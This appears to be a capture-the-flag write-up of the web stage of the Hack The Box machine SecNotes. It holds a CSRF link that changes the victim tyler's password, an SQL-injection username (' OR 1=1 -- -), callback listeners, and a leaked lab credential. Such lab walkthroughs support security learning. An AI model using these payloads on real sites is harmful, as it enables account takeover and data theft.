4 :80 CSRF

# tried login bypass sqli.txt - nothing
# exploring using kashz:iamkashz
# tried template injection using new note, nothing

http://secnotes.htb/contact.php
has a message to be sent to tyler

# enter a link in there, results in callback
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.97 - - [30/Sep/2021 11:28:59] "GET / HTTP/1.1" 200 -

# interesting, capturing request using nc to see more details
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 50929
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228
Host: 10.10.16.7:6969
Connection: Keep-Alive

# tried requesting php shell, aspx shell nothing is working
# link we enter is being called back

# exploring pass_change.php
POST /change_pass.php HTTP/1.1
Host: secnotes.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://secnotes.htb
DNT: 1
Connection: close
Referer: http://secnotes.htb/change_pass.php
Cookie: PHPSESSID=bfvbeoavq8kpfj1ostb7ubvouc
Upgrade-Insecure-Requests: 1

password=iamkashz&confirm_password=iamkashz&submit=submit

# trying to see if GET works
http://secnotes.htb/change_pass.php?password=iamkashz&confirm_password=iamkashz&submit=submit
Password updated. 

# we can use this to CSRF tyler
http://secnotes.htb/change_pass.php?password=iamkashz&confirm_password=iamkashz&submit=submit
http://10.10.16.7/kashz

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.97 - - [30/Sep/2021 12:08:48] code 404, message File not found
10.10.10.97 - - [30/Sep/2021 12:08:48] "GET /kashz HTTP/1.1" 404 -

# tyler has clicked on it
# login as tyler:iamkashz works
we see a note
\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

Method 2:

# register as username: sqlinjection
' OR 1=1 -- -:password

# loggin in, we can see all notes

Last updated